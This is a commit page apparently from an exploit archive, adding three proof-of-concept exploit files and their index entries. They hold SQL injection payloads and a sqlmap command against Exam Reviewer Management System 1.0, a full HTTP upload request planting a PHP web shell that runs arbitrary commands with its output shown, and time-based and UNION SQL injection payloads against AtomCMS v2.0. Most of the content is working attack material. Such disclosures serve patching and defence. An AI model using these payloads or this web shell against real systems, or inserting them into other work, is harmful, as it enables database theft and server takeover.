DB: 2022-02-10
3 changes to exploits/shellcodes Exam Reviewer Management System 1.0 - ‘id’ SQL Injection Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated) AtomCMS v2.0 - SQLi
This commit is contained in:
parent
41553c4004
commit
c86e2ee727
4 changed files with 271 additions and 0 deletions
64
exploits/php/webapps/50725.txt
Normal file
64
exploits/php/webapps/50725.txt
Normal file
|
@ -0,0 +1,64 @@
|
||||||
|
# Exploit Title: Exam Reviewer Management System 1.0 - ‘id’ SQL Injection
|
||||||
|
# Date: 2022-02-18
|
||||||
|
# Exploit Author: Juli Agarwal(@agarwaljuli)
|
||||||
|
# Vendor Homepage:
|
||||||
|
https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html
|
||||||
|
|
||||||
|
# Software Link:
|
||||||
|
https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code
|
||||||
|
|
||||||
|
# Version: 1.0
|
||||||
|
# Tested on: Windows 10/Kali Linux
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Description – The ‘id’ parameter in Exam Reviewer Management System web
|
||||||
|
application is vulnerable to SQL Injection
|
||||||
|
|
||||||
|
Vulnerable URL - http://127.0.0.1/erms/?p=take_exam&id=1
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
POC:-
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
Parameter: id (GET)
|
||||||
|
|
||||||
|
Type: boolean-based blind
|
||||||
|
|
||||||
|
Title: AND boolean-based blind - WHERE or HAVING clause
|
||||||
|
|
||||||
|
Payload: p=take_exam&id=1' AND 4755=4755 AND 'VHNu'='VHNu
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Type: error-based
|
||||||
|
|
||||||
|
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY
|
||||||
|
clause (FLOOR)
|
||||||
|
|
||||||
|
Payload: p=take_exam&id=1' OR (SELECT 8795 FROM(SELECT
|
||||||
|
COUNT(*),CONCAT(0x71766a7071,(SELECT
|
||||||
|
(ELT(8795=8795,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM
|
||||||
|
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'MCXA'='MCXA
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Type: time-based blind
|
||||||
|
|
||||||
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||||
|
|
||||||
|
Payload: p=take_exam&id=1' AND (SELECT 2206 FROM (SELECT(SLEEP(5)))AhEo)
|
||||||
|
AND 'vqGg'='vqGg---
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
*SQLMAP COMMAND*
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
*# sqlmap -u "127.0.0.1/erms/?p=take_exam&id=1
|
||||||
|
<http://127.0.0.1/erms/?p=take_exam&id=1>" -p id --dbs --level 3*
|
144
exploits/php/webapps/50726.txt
Normal file
144
exploits/php/webapps/50726.txt
Normal file
|
@ -0,0 +1,144 @@
|
||||||
|
# Exploit Title: Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated)
|
||||||
|
# Date: 2022-02-08
|
||||||
|
# Exploit Author: Juli Agarwal(@agarwaljuli)
|
||||||
|
# Vendor Homepage:
|
||||||
|
https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html
|
||||||
|
|
||||||
|
# Software Link:
|
||||||
|
https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code
|
||||||
|
|
||||||
|
# Version: 1.0
|
||||||
|
# Tested on: XAMPP, Kali Linux
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Description – The application suffers from a remote code execution in the
|
||||||
|
admin panel. An authenticated attacker can upload a web-shell php file in
|
||||||
|
profile page to achieve remote code execution.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
POC:-
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
==========
|
||||||
|
|
||||||
|
# Request:
|
||||||
|
|
||||||
|
==========
|
||||||
|
|
||||||
|
POST /erms/classes/Users.php?f=save HTTP/1.1
|
||||||
|
|
||||||
|
Host: localhost
|
||||||
|
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101
|
||||||
|
Firefox/91.0
|
||||||
|
|
||||||
|
Accept: */*
|
||||||
|
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
|
||||||
|
X-Requested-With: XMLHttpRequest
|
||||||
|
|
||||||
|
Content-Type: multipart/form-data;
|
||||||
|
boundary=---------------------------37791356766765055891341961306
|
||||||
|
|
||||||
|
Content-Length: 1004
|
||||||
|
|
||||||
|
Origin: http://localhost
|
||||||
|
|
||||||
|
Connection: close
|
||||||
|
|
||||||
|
Referer: http://localhost/erms/admin/?page=user
|
||||||
|
|
||||||
|
Cookie: PHPSESSID=22f0bd65ef694041af3177057e7fbd5a
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------37791356766765055891341961306
|
||||||
|
|
||||||
|
Content-Disposition: form-data; name="id"
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
1
|
||||||
|
|
||||||
|
-----------------------------37791356766765055891341961306
|
||||||
|
|
||||||
|
Content-Disposition: form-data; name="firstname"
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Adminstrator
|
||||||
|
|
||||||
|
-----------------------------37791356766765055891341961306
|
||||||
|
|
||||||
|
Content-Disposition: form-data; name="lastname"
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Admin
|
||||||
|
|
||||||
|
-----------------------------37791356766765055891341961306
|
||||||
|
|
||||||
|
Content-Disposition: form-data; name="username"
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
admin
|
||||||
|
|
||||||
|
-----------------------------37791356766765055891341961306
|
||||||
|
|
||||||
|
Content-Disposition: form-data; name="password"
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------37791356766765055891341961306
|
||||||
|
|
||||||
|
Content-Disposition: form-data; name="img"; filename="shell.php"
|
||||||
|
|
||||||
|
Content-Type: application/x-php
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
<html>
|
||||||
|
|
||||||
|
<body>
|
||||||
|
|
||||||
|
<b>Remote code execution: </b><br><pre>
|
||||||
|
|
||||||
|
<?php if(isset($_REQUEST['cmd'])){ echo
|
||||||
|
"<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
|
||||||
|
|
||||||
|
</pre>
|
||||||
|
|
||||||
|
</body>
|
||||||
|
|
||||||
|
</html>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------37791356766765055891341961306—
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
================
|
||||||
|
|
||||||
|
# Webshell access:
|
||||||
|
|
||||||
|
================
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
# Webshell access via:
|
||||||
|
|
||||||
|
POC: http://localhost/erms/uploads/1644334740_shell.php?cmd=id
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
# Webshell response:
|
||||||
|
|
||||||
|
Remote code execution:
|
||||||
|
|
||||||
|
uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
60
exploits/php/webapps/50727.txt
Normal file
60
exploits/php/webapps/50727.txt
Normal file
|
@ -0,0 +1,60 @@
|
||||||
|
# Exploit Title: AtomCMS v2.0 - SQLi
|
||||||
|
# Date: 08/02/2022
|
||||||
|
# Exploit Author: Luca Cuzzolin aka czz78
|
||||||
|
# Vendor Homepage: https://github.com/thedigicraft/Atom.CMS
|
||||||
|
# Version: v2.0
|
||||||
|
# Category: Webapps
|
||||||
|
# Tested on: Debian linux
|
||||||
|
# CVE : CVE-2022-24223
|
||||||
|
|
||||||
|
|
||||||
|
====================================================
|
||||||
|
|
||||||
|
# PoC : SQLi :
|
||||||
|
|
||||||
|
http://127.0.0.1/Atom.CMS/admin/login.php
|
||||||
|
|
||||||
|
|
||||||
|
POST /Atom.CMS/admin/login.php HTTP/1.1
|
||||||
|
Host: 127.0.0.1
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101
|
||||||
|
Firefox/91.0
|
||||||
|
Accept:
|
||||||
|
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||||
|
Accept-Language: it,en-US;q=0.7,en;q=0.3
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 35
|
||||||
|
Origin: http://127.0.0.1
|
||||||
|
Connection: keep-alive
|
||||||
|
Referer: http://127.0.0.1/Atom.CMS/admin/login.php
|
||||||
|
Cookie: PHPSESSID=tqfebdu4kn9qj7g6qpa91j9859
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Sec-Fetch-Dest: document
|
||||||
|
Sec-Fetch-Mode: navigate
|
||||||
|
Sec-Fetch-Site: same-origin
|
||||||
|
Sec-Fetch-User: ?1
|
||||||
|
email=test%40test.com&password=1234
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerable Payload :
|
||||||
|
|
||||||
|
Parameter: email (POST)
|
||||||
|
Type: time-based blind
|
||||||
|
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
|
||||||
|
Payload: email=test@test.com' AND (SELECT 5613 FROM
|
||||||
|
(SELECT(SLEEP(5)))JnLZ) AND 'pROE'='pROE&password=1234
|
||||||
|
Vector: AND (SELECT [RANDNUM] FROM
|
||||||
|
(SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
|
||||||
|
|
||||||
|
Type: UNION query
|
||||||
|
Title: Generic UNION query (NULL) - 6 columns
|
||||||
|
Payload: email=test@test.com' UNION ALL SELECT
|
||||||
|
NULL,CONCAT(0x717a767a71,0x65557a784e446152424b63724b5a737062464a4267746c70794d5976484c484a5365634158734975,0x71627a7871),NULL,NULL,NULL,NULL--
|
||||||
|
-&password=1234
|
||||||
|
Vector: UNION ALL SELECT NULL,[QUERY],NULL,NULL,NULL,NULL-- -
|
||||||
|
---
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
====================================================
|
|
@ -44799,3 +44799,6 @@ id,file,description,date,author,type,platform,port
|
||||||
50721,exploits/php/webapps/50721.py,"Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion",1970-01-01,Ven3xy,webapps,php,
|
50721,exploits/php/webapps/50721.py,"Wordpress Plugin Simple Job Board 2.9.3 - Local File Inclusion",1970-01-01,Ven3xy,webapps,php,
|
||||||
50723,exploits/php/webapps/50723.txt,"WordPress Plugin Security Audit 1.0.0 - Stored Cross Site Scripting (XSS)",1970-01-01,"Shweta Mahajan",webapps,php,
|
50723,exploits/php/webapps/50723.txt,"WordPress Plugin Security Audit 1.0.0 - Stored Cross Site Scripting (XSS)",1970-01-01,"Shweta Mahajan",webapps,php,
|
||||||
50724,exploits/php/webapps/50724.txt,"WordPress Plugin CP Blocks 1.0.14 - Stored Cross Site Scripting (XSS)",1970-01-01,"Shweta Mahajan",webapps,php,
|
50724,exploits/php/webapps/50724.txt,"WordPress Plugin CP Blocks 1.0.14 - Stored Cross Site Scripting (XSS)",1970-01-01,"Shweta Mahajan",webapps,php,
|
||||||
|
50725,exploits/php/webapps/50725.txt,"Exam Reviewer Management System 1.0 - ‘id’ SQL Injection",1970-01-01,"Juli Agarwal",webapps,php,
|
||||||
|
50726,exploits/php/webapps/50726.txt,"Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Juli Agarwal",webapps,php,
|
||||||
|
50727,exploits/php/webapps/50727.txt,"AtomCMS v2.0 - SQLi",1970-01-01,"Luca Cuzzolin",webapps,php,
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue